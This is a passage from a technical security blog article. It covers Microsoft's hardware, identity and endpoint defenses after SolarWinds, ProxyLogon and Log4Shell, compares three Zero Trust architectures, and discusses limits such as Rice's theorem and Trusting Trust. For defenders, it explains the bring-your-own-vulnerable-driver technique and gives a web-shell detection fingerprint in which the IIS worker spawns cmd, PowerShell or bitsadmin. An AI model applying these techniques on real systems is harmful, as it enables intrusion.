    subgraph DiscreteTPM[Discrete TPM topology]
    A1[CPU package] -- LPC or SPI bus, externally observable --&amp;gt; A2[Discrete TPM chip]
    A2 --&amp;gt; A3[VMK released to CPU at boot]
    A4[Attacker with logic analyzer] -. sniffs bus traffic .-&amp;gt; A1
    end
    subgraph PlutonTopology[Pluton topology]
    B1[CPU package containing Pluton] --&amp;gt; B2[VMK released inside package, no external bus]
    B3[Attacker with logic analyzer] -. nothing to sniff .-&amp;gt; B1
    end
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Matthew Garrett&apos;s April 2022 analysis of an AMD Ryzen 6000 firmware image documented that the PSP directory entry 0xB, bit 36, is an OEM-controlled toggle that disables Pluton at the firmware level [@mjg59-pluton]. Garrett&apos;s analysis confirmed Pluton silicon was present on his test machine and could be disabled by the OEM, not by the end user. The architectural implication is that &quot;the system has a Pluton&quot; and &quot;Pluton is enabled and acting as the TPM&quot; are independent claims, and an enterprise threat model that turns on the latter needs verification, not inference from the former.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The framing the Pluton announcement made explicit is the one that matters in the context of this article. Pluton is the &lt;em&gt;hardware&lt;/em&gt; response to a &lt;em&gt;supply-chain class&lt;/em&gt;. Discrete TPM was a supply chain answer for cryptographic identity; the LPC and SPI buses are a supply chain leak point because they cross a packaging boundary. Pluton closes the leak point by collapsing the boundary. The fact that the announcement landed three weeks before SUNBURST is coincidence; the fact that the two events name the same architectural problem at different layers is not.&lt;/p&gt;
&lt;h3&gt;6.2 The Windows 11 Hardware Baseline&lt;/h3&gt;
&lt;p&gt;Windows 11 reached general availability on October 5, 2021 [@win11-introducing]. The new install gate required TPM 2.0 and &lt;a href=&quot;https://paragmali.com/blog/secure-boot-in-windows-the-chain-from-sector-zero-to-userini/&quot; rel=&quot;noopener&quot;&gt;UEFI Secure Boot&lt;/a&gt; [@win11-specs] -- the first mainstream Microsoft operating system to require hardware roots of trust as a precondition for installation. The Windows installer verifies both at the install screen and refuses to proceed on systems that lack them.&lt;/p&gt;
&lt;p&gt;The registry workaround at &lt;code&gt;HKLM\SYSTEM\Setup\MoSetup\AllowUpgradesWithUnsupportedTPMOrCPU&lt;/code&gt; allows installation on systems with TPM 1.2 or an unsupported CPU model, but only as an in-place upgrade and only with explicit warning that the configuration is unsupported. The workaround is not part of the official install path; it documents the existence of an escape hatch without endorsing it. The architectural claim (&quot;Windows 11 requires TPM 2.0 by official policy&quot;) is the operative one for fleet management.&lt;/p&gt;
&lt;p&gt;The baseline does not eliminate the bootkit class. BlackLotus, disclosed in 2023, exploited CVE-2022-21894 to defeat Secure Boot on systems that had not patched the underlying bootloader vulnerability [@eset-blacklotus-2023]. The hardware-root-of-trust install gate is a baseline, not a ceiling. What it accomplishes architecturally is a population-level shift: by mid-2024, the median Windows 11 installation has a TPM, has Secure Boot enabled, and has measured boot data that VBS-based defenses (Credential Guard, HVCI) can layer on top of. Credential Guard in particular reached default-enabled status on hardware that meets the requirements in Windows 11 22H2 [@ms-credential-guard].&lt;/p&gt;
&lt;h3&gt;6.3 Conditional Access, CAE, and the Primary Refresh Token&lt;/h3&gt;
&lt;p&gt;The cloud-identity defense stack is the primitive that the four incidents most directly produced. Three components compose it, with explicit period-correct naming.&lt;/p&gt;

Microsoft&apos;s Zero Trust policy engine for Microsoft Entra ID (formerly Azure AD) [@ms-conditional-access]. A Conditional Access policy is an if-then statement that takes signals (user identity, group memberships, device compliance state, location, sign-in risk score, application being accessed) and produces an enforcement decision (allow, require multi-factor, require compliant device, block). Conditional Access policies act as the Policy Decision Point in the NIST SP 800-207 architecture; the resource being accessed acts as the Policy Enforcement Point.

The mechanism by which a resource server can be informed mid-session that the user&apos;s risk state has changed and the existing access token should be re-evaluated [@ms-cae]. CAE is Microsoft&apos;s implementation of the OpenID Continuous Access Evaluation Profile (CAEP) [@openid-caep-spec], a Shared Signals and Events Framework standard. The Microsoft Learn CAE documentation describes critical-event evaluation as near real-time with up to fifteen minutes of event-propagation delay for some signals; IP-location policy enforcement propagates instantly [@ms-cae]. The initial supported relying parties are Exchange Online, SharePoint Online, and Teams [@ms-cae].

A long-lived authentication artifact issued by Microsoft Entra ID to first-party token brokers on Microsoft Entra joined and hybrid-joined devices [@ms-prt]. The PRT enables single sign-on across the applications used on those devices. The PRT&apos;s session key is non-exportable: on TPM-enabled devices the key is bound to the TPM and cannot be extracted from the machine. The PRT is the artifact that makes &quot;compliant device&quot; a meaningful signal in Conditional Access policies, because possession of a valid PRT cryptographically demonstrates the user is signing in from the specific device the PRT was issued to.
&lt;p&gt;The &quot;Azure AD&quot; to &quot;Microsoft Entra ID&quot; rename history matters for citations and for tooling. Azure AD was the canonical name through July 11, 2023; the Microsoft Entra family umbrella was introduced on May 31, 2022 (Vasu Jakkal&apos;s Microsoft Security Blog post &quot;Secure access for a connected world--meet Microsoft Entra&quot; naming Azure AD, Cloud Infrastructure Entitlement Management, and decentralized identity as the initial family members [@ms-entra-launch-may2022]) but applied only to specific product families at that point; the Azure AD-to-Entra ID rename was July 11, 2023 [@ms-entra-rebrand]. Documentation written in 2021-2022 uses &quot;Azure AD&quot; throughout; documentation written after July 2023 uses &quot;Microsoft Entra ID&quot; throughout. Both names refer to the same product.&lt;/p&gt;

flowchart LR
    A[User on Entra-joined device] --&amp;gt; B[Device requests PRT, TPM-bound session key]
    B --&amp;gt; C[Entra ID issues PRT]
    C --&amp;gt; D[App access request, includes PRT-derived access token]
    D --&amp;gt; E[Conditional Access policy engine, the PDP]
    E --&amp;gt; F{&quot;Signals, identity, device, location, risk score&quot;}
    F --&amp;gt; G[Decision: allow, MFA, block]
    G --&amp;gt; H[Resource server, the PEP]
    H --&amp;gt; I[CAE channel back to Entra]
    I --&amp;gt; J[Risk-event signal triggers re-evaluation]
    J --&amp;gt; E
&lt;p&gt;Together, the three primitives operationalize the Zero Trust framing in the Microsoft cloud-identity layer. &lt;a href=&quot;https://paragmali.com/blog/who-decided-this-token-is-good-a-field-guide-to-conditional-/&quot; rel=&quot;noopener&quot;&gt;Conditional Access&lt;/a&gt; decides at the PDP; CAE keeps the decision live after the initial sign-in; the &lt;a href=&quot;https://paragmali.com/blog/inside-the-primary-refresh-token-the-cryptographic-seam-betw/&quot; rel=&quot;noopener&quot;&gt;PRT&lt;/a&gt; with TPM hardware binding makes the device-identity signal cryptographically meaningful rather than reputational. Microsoft Entra ID Protection layers risk-based signal-scoring on top, with detections for anomalous tokens, atypical travel patterns, and suspicious multi-factor approval flows [@ms-identity-protection-risks].&lt;/p&gt;
&lt;h3&gt;6.4 LSA Protection and the Vulnerable Driver Blocklist&lt;/h3&gt;
&lt;p&gt;The fourth Windows-side primitive is the pair of defaults that landed in 2022-2023 against credential-theft and bring-your-own-vulnerable-driver attacks respectively.&lt;/p&gt;

A Windows mechanism, introduced as an opt-in feature on Windows 8.1 and Windows Server 2012 R2 [@ms-lsa-protection], that runs the Local Security Authority subsystem (`lsass.exe`) as a Protected Process Light. The PPL status prevents non-PPL processes (including those running as SYSTEM) from opening LSASS with the access rights required for memory inspection or code injection. Mimikatz-style credential extraction from LSASS memory becomes unavailable to malware running outside the PPL trust level. The Microsoft Learn Windows 11 Security Book confirms the current default behavior: &quot;LSA protection is enabled by default on all devices to help safeguard credentials. For new installations, it activates immediately. For upgrades, it becomes active after a five-day evaluation period followed by a system reboot&quot; [@ms-win11-credprot-book] -- the audit-then-enforce rollout pattern that turned the opt-in 2013-era control into a default-on Windows 11 22H2 primitive; upgraded systems and systems flagged as incompatible remain opt-in.

An attack pattern in which the attacker installs a *legitimately signed* third-party kernel driver that contains a known vulnerability, then exploits the driver&apos;s vulnerability to obtain kernel-mode code execution. The attacker thereby converts a userspace foothold into a kernel-mode foothold without writing kernel code that would have to pass Microsoft&apos;s signing process. The Vulnerable Driver Blocklist [@ms-driver-blocklist] is Microsoft&apos;s curated list of drivers known to be exploitable for BYOVD; Microsoft&apos;s KB5020779 -- titled &quot;The vulnerable driver blocklist after the October 2022 preview release&quot; -- states explicitly that &quot;Starting with Windows 11, version 22H2, the blocklist is also enabled by default on all devices&quot; [@ms-kb5020779-driverblocklist], anchoring both the October 2022 servicing milestone and the 22H2 default-on rollout. Community catalogs like LOLDrivers [@loldrivers] track the broader population.
&lt;p&gt;The defaults matter precisely because the opt-in posture from 2013 onward did not produce population-level coverage. &lt;a href=&quot;https://paragmali.com/blog/protected-process-light-when-the-administrator-isnt-enough/&quot; rel=&quot;noopener&quot;&gt;LSA Protection&lt;/a&gt; had been available for nine years before it shipped as a default; Vulnerable Driver Blocklist was available as a WDAC policy for several years before the default. The change in 2022-2023 is not the existence of the controls but the population they cover by default. Windows 11 22H2 fleets in 2024-2026 are the first Windows population in which a meaningful fraction of installs are LSA-Protected at sign-in and blocking the canonical &lt;a href=&quot;https://paragmali.com/blog/windows-kernel-code-integrity-2006-2026/&quot; rel=&quot;noopener&quot;&gt;BYOVD drivers&lt;/a&gt; at kernel-load time, on the default install path, without an administrator having configured the feature.&lt;/p&gt;
&lt;p&gt;These four primitives -- Pluton at silicon, the Windows 11 hardware baseline at the OS install gate, Conditional Access with CAE and PRT at the cloud-identity layer, LSA Protection and Vulnerable Driver Blocklist as defaults on the endpoint -- are coherent if and only if they are layered. The fifth primitive, the Defender XDR composition plane, is what &lt;em&gt;makes&lt;/em&gt; them layerable in practice.&lt;/p&gt;
&lt;h3&gt;6.5 Microsoft Defender XDR: The Composition Primitive&lt;/h3&gt;
&lt;p&gt;No single Defender product covers the full attack chain of any of the four 2020-2023 incidents. SUNBURST touches the endpoint, on-premises Active Directory, ADFS, and Microsoft 365 in sequence. ProxyLogon touches the IIS worker process, the file system, and downstream Exchange mailboxes. PrintNightmare touches the Spooler RPC interface on a Domain Controller. Log4Shell touches a Java application&apos;s process tree on Windows. The detection telemetry for each lives in a different product surface.&lt;/p&gt;

The unified incident-correlation and advanced-hunting plane that consolidates four product-level Defender products into a single security operations surface at `security.microsoft.com`. The four products are Microsoft Defender for Endpoint (workstation and server EDR), Microsoft Defender for Identity (on-premises Active Directory and ADFS detection) [@ms-defender-identity-creds], Microsoft Defender for Cloud Apps (cloud-session anomaly detection) [@ms-defender-cloud-apps-anomaly], and Microsoft Defender for Office 365 (email and collaboration phishing detection). XDR contributes three primitives the individual products cannot provide on their own: a common Kusto Query Language advanced-hunting schema across the four telemetry streams, incident correlation that groups alerts across products into a single cross-domain incident, and Automated Investigation and Response playbooks that span product boundaries.
&lt;p&gt;The architectural role of each product against the article&apos;s incident set is specific.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;a href=&quot;https://paragmali.com/blog/microsoft-defender-for-identity-the-defensive-ad-stack-that-/&quot; rel=&quot;noopener&quot;&gt;Defender for Identity&lt;/a&gt;&lt;/strong&gt; sources from Domain Controller event streams and from ADFS event logs. Its load-bearing detections against the SolarWinds-class follow-on are the SACL-based &lt;a href=&quot;https://paragmali.com/blog/two-checkmarks-and-the-keys-to-the-kingdom-how-active-direct/&quot; rel=&quot;noopener&quot;&gt;DCSync detection&lt;/a&gt; (which audits the three Directory-Replication-Get-Changes extended-rights GUIDs against AD event 4662 for non-DC principals) and the Golden SAML composite signal, which fuses an ADFS-anomaly alert with a downstream cloud-session anomaly and an Entra ID Protection risk-score elevation into a single correlated incident [@ms-defender-identity-creds]. The on-premises attack and the cloud-side forged-token consequence get joined in one investigation rather than two.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Defender for Endpoint&lt;/strong&gt; carries the canonical ProxyLogon-class fingerprint: the IIS worker process &lt;code&gt;w3wp.exe&lt;/code&gt; spawning &lt;code&gt;cmd.exe&lt;/code&gt;, &lt;code&gt;powershell.exe&lt;/code&gt;, &lt;code&gt;cscript.exe&lt;/code&gt;, or &lt;code&gt;bitsadmin.exe&lt;/code&gt; as a direct child [@ms-webshell-hunting-2021-feb]. The fingerprint generalizes beyond Exchange. The same parent-child pattern is the canonical web-shell pivot for ProxyShell against Exchange Server, for OGNL injection against Atlassian Confluence, and for any Java application-server exploitation against Tomcat on Windows in which the post-exploitation step drops a shell. One detection rule, multiple incident classes.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Defender for Cloud Apps&lt;/strong&gt; runs the anomaly-detection plane against cloud sessions [@ms-defender-cloud-apps-anomaly]. The seven-day learning window builds a per-user behavioral baseline; subsequent sessions are scored against the baseline across impossible-travel, geographic deviation, device-fingerprint deviation, claim-set deviation, and token-lifetime deviation axes. The architectural significance against Storm-0558-class incidents is precisely that the cryptographic verification path will (by definition) accept a token forged with a stolen signing key -- so the catch has to happen at the behavioral layer rather than the signature layer. Defender for Cloud Apps is the heuristic anomaly net under the cryptographic floor.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Defender for Office 365&lt;/strong&gt; runs the upstream-vector layer for email and collaboration spearphishing -- the operator-pre-exploitation phase common to SolarWinds-class and HAFNIUM-class operations where the actor builds initial reconnaissance and credential access before reaching the production network. Its role in the article&apos;s incident set is preventive rather than detective: closing the recon entry path before the lateral-movement phase has a chance to begin.&lt;/p&gt;

flowchart TD
    A[Defender for Endpoint] --&amp;gt; E[Common KQL advanced-hunting schema]
    B[Defender for Identity] --&amp;gt; E
    C[Defender for Cloud Apps] --&amp;gt; E
    D[Defender for Office 365] --&amp;gt; E
    E --&amp;gt; F[Incident correlation engine]
    F --&amp;gt; G[Cross-domain incidents]
    G --&amp;gt; H[Automated Investigation and Response]
    H --&amp;gt; I[Cross-product remediation playbooks]
&lt;p&gt;The canonical example of why XDR is the composition primitive: the SUNBURST chain produces a Defender for Endpoint network-beacon alert on the customer&apos;s Orion server (the SUNBURST DGA C2 callback), a Defender for Identity ADFS-token-extraction alert when the attacker takes the token-signing key off the ADFS host, a Defender for Cloud Apps Golden-SAML-pivoted session alert when the forged token authenticates against Exchange Online, and an Entra ID Protection forged-token sign-in alert with an anomalous claim set. Four product-level alerts. One real incident. Without the correlation plane, the alerts arrive as four separately triaged tickets; with it, they arrive as one investigation.&lt;/p&gt;
&lt;p&gt;The framing the §6 architecture lands on is that the composition is structurally necessary. No 2020-2021 incident is &lt;em&gt;covered&lt;/em&gt; by one of the five primitives alone. The 2022-2023 step forward is that all five primitives ship at scale; the load-bearing architectural argument is that none of them is sufficient in isolation. The next section walks the three competing architectural positions that determine &lt;em&gt;how&lt;/em&gt; they are layered in practice.&lt;/p&gt;
&lt;h2&gt;7. Three Live Zero Trust Specifications&lt;/h2&gt;
&lt;p&gt;There is not one Zero Trust architecture in 2024-2026. There are three, and they are not interchangeable. Each closes a different gap; none closes all three.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Microsoft full-stack Zero Trust.&lt;/strong&gt; The Microsoft posture is tightly integrated: Microsoft Entra ID for identity, Defender XDR for endpoint and cloud telemetry, Intune for device management, Purview for data classification, with Conditional Access as the policy engine that ties them together [@ms-zt-overview, @ms-zt-learn]. Microsoft Inside Track&apos;s published case study describes Microsoft&apos;s own seven-year internal transformation along this stack, anchored on four canonical scenarios: phishing-resistant MFA everywhere, device health attested before access, pervasive telemetry, and least-privilege enforcement [@ms-zt-at-microsoft]. Microsoft&apos;s deployment guide hub organizes the architecture along six pillars (Identity, Endpoints, Applications, Data, Infrastructure, Networks). Microsoft maintains a customer-stories portal at &lt;code&gt;customers.microsoft.com&lt;/code&gt; with published case studies across consumer-goods, financial-services, healthcare, and public-sector cohorts. The case for the full-stack posture: operational coherence, integrated telemetry across identity and device, one policy plane to reason about. The case against: single-vendor risk, which SolarWinds made acutely concrete -- a posture in which one vendor supplies your operating system, identity provider, endpoint, and cloud productivity stack is architecturally homogeneous in exactly the way SUNBURST taught the industry to interrogate.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Best-of-breed multi-vendor.&lt;/strong&gt; The third-party alternative composes an identity-as-a-service provider (Okta or Ping Identity), a third-party EDR (CrowdStrike Falcon or SentinelOne), a Secure Service Edge or Secure Web Gateway (Palo Alto Prisma or Zscaler), and a separate SIEM and SOAR for telemetry and orchestration. Okta&apos;s customer-stories portal positions itself around a &quot;two-thirds of the Fortune 100&quot; framing [@okta-customers]; the multi-vendor cohort spans Fortune 500 deployments across logistics, telecom, hospitality, and retail, with case studies on Okta&apos;s per-customer pages [@okta-customers]. The case for: cross-vendor coverage of the supply-chain class, on the principle that two independent vendor failures are less correlated than one. The case against: operational complexity, integration burden, and the recursive observation that &lt;em&gt;any&lt;/em&gt; third-party vendor on the trusted-publisher list is itself a SolarWinds-style trust assumption -- the multi-vendor posture distributes the risk rather than eliminating it.&lt;/p&gt;
&lt;p&gt;Both Microsoft&apos;s and Okta&apos;s customer-stories portals are organized by industry segment and per-customer case-study URL; specific named-customer cohorts vary as case studies are added, retired, or refreshed, so this article keeps the cohort framing at the industry-segment level rather than enumerating a fixed list of named brands [@ms-zt-at-microsoft, @okta-customers].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Federal Zero Trust (CISA ZTMM v2.0 and the OMB M-22-09 baseline).&lt;/strong&gt; CISA published the Zero Trust Maturity Model v2.0 in April 2023 [@cisa-ztmm-v2]. The model defines a vendor-neutral architecture across five pillars (Identity, Devices, Networks, Applications and Workloads, Data) with three cross-cutting capabilities (Visibility and Analytics, Automation and Orchestration, Governance) and four maturity stages (Traditional, Initial, Advanced, Optimal). OMB Memorandum M-22-09 set the FY24 implementation baseline [@omb-m-22-09]. The DHS-specific operationalization, &lt;em&gt;CISA Zero Trust Architecture Implementation&lt;/em&gt;, was published in January 2025 as the playbook for the department-level rollouts [@dhs-zta-impl]. The GAO audit GAO-24-106343 reported in March 2024 that the lead-implementation agencies (CISA, NIST, OMB) had fully completed 49 of 55 EO 14028 requirements, partially completed 5, with one not applicable [@gao-24-106343]. The SEC Office of Inspector General&apos;s September 2023 Final Management Letter is the canonical published example of an agency-level M-22-09 readiness review [@sec-oig-zt-mgmt-letter]. The case for: auditability, procurement neutrality, alignment with the federal mandate, and a measurable scorecard. The case against: it is a maturity model rather than an architectural specification, and adoption pace across federal civilian agencies has lagged the FY24 target the OMB memo set.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Pillar / Cost dimension&lt;/th&gt;
&lt;th&gt;Microsoft full-stack&lt;/th&gt;
&lt;th&gt;Best-of-breed multi-vendor&lt;/th&gt;
&lt;th&gt;Federal CISA ZTMM v2.0&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Trust root&lt;/td&gt;
&lt;td&gt;Microsoft Entra ID + Microsoft Pluton&lt;/td&gt;
&lt;td&gt;Mixed (Okta or Ping for SAML, third-party EDR)&lt;/td&gt;
&lt;td&gt;Vendor-neutral; agency choice within five pillars&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Identity plane&lt;/td&gt;
&lt;td&gt;Entra ID with Conditional Access, CAE, PRT&lt;/td&gt;
&lt;td&gt;Okta or Ping with SAML to downstream apps&lt;/td&gt;
&lt;td&gt;Identity pillar with phishing-resistant MFA baseline&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Endpoint&lt;/td&gt;
&lt;td&gt;Defender for Endpoint&lt;/td&gt;
&lt;td&gt;CrowdStrike Falcon or SentinelOne&lt;/td&gt;
&lt;td&gt;Devices pillar; agency-selected EDR&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Network&lt;/td&gt;
&lt;td&gt;Microsoft Global Secure Access&lt;/td&gt;
&lt;td&gt;Palo Alto Prisma or Zscaler&lt;/td&gt;
&lt;td&gt;Networks pillar; SASE neutral&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Integration FTE estimate&lt;/td&gt;
&lt;td&gt;Low to medium (single-vendor APIs)&lt;/td&gt;
&lt;td&gt;High (cross-vendor API integration)&lt;/td&gt;
&lt;td&gt;Medium to high (M-22-09 compliance overhead)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Vendor supply-chain blast radius&lt;/td&gt;
&lt;td&gt;Concentrated at one vendor&lt;/td&gt;
&lt;td&gt;Distributed across four-plus vendors&lt;/td&gt;
&lt;td&gt;Distributed; auditability primary&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

Microsoft was a SolarWinds Orion customer. Microsoft was one of the roughly one hundred follow-on victims of the SUNBURST follow-on phase. The MSRC final investigation update of February 18, 2021 documented the actor&apos;s late-November 2020 first viewing of files in source repositories, with continued attempts at access into early January 2021 [@msrc-solorigate-final]. The report named the targeted product families -- a small subset of Azure, Intune, and Exchange source-code repositories -- and confirmed no evidence of access to production services or customer data. Microsoft&apos;s own written conclusion was instructive: defense-in-depth protections prevented the actor from acquiring privileged credentials or executing SAML-token-forgery against Microsoft&apos;s corporate domains, and &quot;in deployments that connect on-premises infrastructure to the cloud, organizations can delegate trust to on-premises components ... this creates an additional seam that organizations need to secure.&quot;&lt;p&gt;The best-of-breed multi-vendor argument is most concretely supported by Microsoft&apos;s own post-incident analysis, not by any third-party advocacy. A Zero Trust posture in which the &lt;em&gt;policy engine&lt;/em&gt; and the &lt;em&gt;operating system&lt;/em&gt; and the &lt;em&gt;identity provider&lt;/em&gt; share a vendor -- and that vendor was itself a follow-on victim of a supply-chain compromise that targeted its source repositories -- needs to interrogate the assumption that one vendor&apos;s defense-in-depth is the load-bearing primitive. The Microsoft public conclusion is that defense-in-depth held; the structural observation the post-mortem invites is that &quot;no single vendor should be the trust anchor for the policy engine that defends against vendor compromise.&quot;
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;

Per-vendor licensing is the visible cost. The hidden cost is the engineering FTE the organization needs to maintain the integration graph between products: SCIM provisioning between IdP and downstream apps; SIEM connector maintenance across product versions; cross-product alert-correlation logic that the XDR composition plane handles for free in the Microsoft full-stack but has to be built from scratch in the best-of-breed posture. Federal cohort budgets generally absorb this via a dedicated cybersecurity-modernization line item that commercial Zero Trust pilots rarely receive. The integration-FTE cost is the most under-discussed input to the three-position choice.
&lt;p&gt;All three are responses to the same incident clustering; none of them closes the structural ceiling the next section names.&lt;/p&gt;
&lt;h2&gt;8. What Even Perfect Execution Cannot Reach&lt;/h2&gt;
&lt;p&gt;If the four 2020-2021 incidents broke four engineering assumptions, the three bounds in this section are not engineering. They are mathematics and architecture.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Thompson&apos;s &quot;Trusting Trust.&quot;&lt;/strong&gt; A compiler that compiles itself can embed a backdoor that survives indefinitely with no trace in any audited source [@thompson-1984-acm, @thompson-nakamoto-reading]. SLSA addresses the &lt;em&gt;visibility&lt;/em&gt; problem (what is in your supply chain) by attesting to build steps and provenance [@slsa-v1-levels]. SBOM addresses the &lt;em&gt;composition&lt;/em&gt; problem (what components are in your artifact) by inventorying dependencies. Neither addresses the &lt;em&gt;trust&lt;/em&gt; problem (what your supply-chain participants chose to do at points the attestations do not cover). SLSA Build Level 3 hardens the build platform; the hardened build platform&apos;s own toolchain is still an implicit trust root, and an attacker who compromises the toolchain at a layer below the attestation produces attested artifacts that are nevertheless malicious. The 1984 bound is not closed by 2026 supply-chain tooling.&lt;/p&gt;

A foundational result in computability theory (Henry Rice, 1953) stating that for any non-trivial semantic property of programs, no algorithm decides whether an arbitrary program has that property. The theorem bounds what static analysis of program behavior can achieve: no analyzer can decide, in general, whether a program will exfiltrate data, alter records, escalate privileges, or otherwise perform a given semantic action. Fred Cohen&apos;s 1984 &quot;Computer Viruses: Theory and Experiments&quot; applied the same bound to malware detection [@cohen-1984-virus]: no general algorithm can decide whether a program is a virus. SBOM tells you *what* is running; Rice tells you it cannot tell you whether what is running is safe.
&lt;p&gt;&lt;strong&gt;Cohen 1984 and Rice&apos;s Theorem.&lt;/strong&gt; SBOM data, combined with vulnerability databases, can answer &quot;do we have a known-vulnerable component?&quot; -- and Log4Shell IR proved that answer&apos;s value. SBOM cannot answer &quot;is the component we have behaving safely?&quot; -- and the post-Log4Shell follow-on CVEs proved that gap&apos;s reality. The composition is decidable; the semantics is not. Rice&apos;s Theorem is the bound on what an SBOM-plus-CVE-database posture can detect at scale.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The same-privilege paradox at the orchestration plane.&lt;/strong&gt; A Zero Trust policy engine that decides every access decision is itself a privileged component. If the policy engine is compromised, the decisions it produces are not trustworthy, and the resources downstream of the engine cannot tell legitimate decisions from forged ones. Microsoft&apos;s &quot;Assume Breach&quot; third principle [@ms-zt-overview] is the operational acknowledgment that this ceiling is unsolved rather than closed -- &quot;Assume Breach&quot; is a posture for limiting blast radius after compromise, not a mechanism for preventing the compromise of the orchestration plane itself.&lt;/p&gt;
&lt;p&gt;The 1984 result was load-bearing in December 2020. The 1953 theorem is load-bearing in December 2026. Both are still load-bearing, and the post-2023 stack does not close either.&lt;/p&gt;
&lt;h2&gt;9. Five Things 2026 Still Cannot Do&lt;/h2&gt;
&lt;p&gt;The Generation 5 stack walked in Section 6 is a necessary architectural pivot. It is not sufficient. Five honest residuals close out the open-problem framing.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Build-pipeline trust at scale.&lt;/strong&gt; SLSA Build Level 3 adoption remains incomplete in 2026. Reproducible builds are still a research aspiration on most Linux distributions and an aspirational footnote on Windows. The median enterprise cannot answer &quot;did this binary come from this source commit?&quot; with cryptographic evidence; the answer in practice is &quot;the vendor&apos;s release notes say so.&quot; in-toto attestations [@in-toto-home] cover specific build steps in mature deployments. The Generation 5 stack reduces the surface SUNBURST exploited; it does not foreclose it.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Identity-provider compromise as a class.&lt;/strong&gt; Storm-0558 (disclosed July 2023, with the full root-cause investigation published in September 2023) is the post-window existence proof that the policy engine itself is a privileged plane [@msrc-storm-0558]. A 2021 crash dump that should not have contained signing-key material did contain Microsoft&apos;s consumer Microsoft Service Account (MSA) signing key; an engineer-account compromise enabled exfiltration of the dump; a validation flaw in Microsoft&apos;s enterprise token validation allowed consumer keys to sign enterprise tokens; the attacker forged Outlook Web Access and Exchange Online tokens for approximately twenty-five organizations, including U.S. State Department mailboxes. The incident is queued for Part 6.&lt;/p&gt;

Microsoft&apos;s designation for the China-based threat actor responsible for the July 2023 forged-token campaign against Outlook Web Access and Exchange Online, affecting approximately twenty-five organizations including U.S. State Department mailboxes [@msrc-storm-0558]. The incident sits outside this article&apos;s December 2021 closing window and structures Part 6 of the series.

Part 6 of this series picks up the trust-root layer where Generation 5 left it. The architectural shape of the next era is the question Storm-0558 opened: if the identity provider&apos;s signing key is the trust root, what closes the compromise of that key as a class? Plausible answers in 2026 include shorter-lived signing keys with cryptographic attestation of issuance, threshold-signed identity providers that require multi-party participation in key use, sender-constrained tokens (DPoP) that bind tokens to specific client keys, and hardware-rooted attestation chains for identity-provider infrastructure. All of these are research-grade or early-deployment as of this article; the trust-root layer is the architectural frontier the post-2023 incidents have foregrounded.
&lt;p&gt;&lt;strong&gt;Cross-vendor and managed-service-provider supply chains.&lt;/strong&gt; The SolarWinds-class lesson did not generalize. The 3CX VoIP-client supply-chain compromise in March 2023 (attributed to UNC4736, a suspected North Korean nexus cluster Mandiant linked to Lazarus-class operations) [@mandiant-3cx-2023], the MOVEit file-transfer mass-exploitation by Cl0p in May-June 2023 [@cisa-aa23-158a], and the Change Healthcare [@unitedhealth-changehc-8k] and CDK Global [@cyberscoop-cdk-2024] cascades in 2024 demonstrated that the build-pipeline-trust lesson translated unevenly across third-party data-transfer and managed-service-provider classes. SLSA and SBOM are necessary tooling; they have not produced a population-level change in cross-vendor supply-chain risk.&lt;/p&gt;
&lt;p&gt;The 2023-2024 supply-chain cascade (3CX, MOVEit, Change Healthcare, CDK Global) is the empirical reply to the &quot;SolarWinds taught the industry&quot; narrative. The lesson taught the industry to look for build-pipeline compromise of large software vendors; it did not, at the population level, teach the industry to look for the same class of compromise in mid-market communications, file-transfer, and dealer-management vendors. The structural problem the four-incident cluster of 2020-2021 named is still operative.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Conditional Access policy drift.&lt;/strong&gt; Mature Microsoft Entra tenants routinely carry dozens of Conditional Access policies, with overlapping conditions, exclusions, and break-glass account exceptions. The cloud-identity equivalent of BloodHound -- a graph-analysis approach to enumerating reachable Tier-0 identities and policy bypasses -- remains research-grade in 2026. AzureHound and BloodHound Community Edition [@bloodhound-specterops] extend the on-premises model to the cloud, but production tooling for policy-graph analysis has not yet reached parity with the rate at which CA policies accumulate.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;SBOM as forensics tool versus prevention tool.&lt;/strong&gt; The Log4Shell IR experience demonstrated SBOM&apos;s &lt;em&gt;forensics&lt;/em&gt; utility: organizations that had SBOM data answered &quot;are we exposed?&quot; in hours, while organizations without it took weeks. The &lt;em&gt;prevention&lt;/em&gt; utility -- refusing to install software whose components fail policy -- has been slower to mature, both because component-policy semantics are not standardized and because the practical effect would be a substantial change to the enterprise software procurement model.&lt;/p&gt;
&lt;h2&gt;10. What a Practitioner Does Today&lt;/h2&gt;
&lt;p&gt;If you are reading this on a Monday, here is what you do this week, this quarter, this year, and what you stop trying to do entirely.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Lane 1: Preventive hygiene.&lt;/strong&gt; Inventory vendor build-pipeline exposure. Which vendors push signed code to your endpoints? Which auto-update? Which are deployed via SCCM, Intune, or Workspace ONE? The inventory is the SolarWinds homework. Inventory internet-facing pre-auth surfaces (the ProxyLogon homework).&lt;/p&gt;
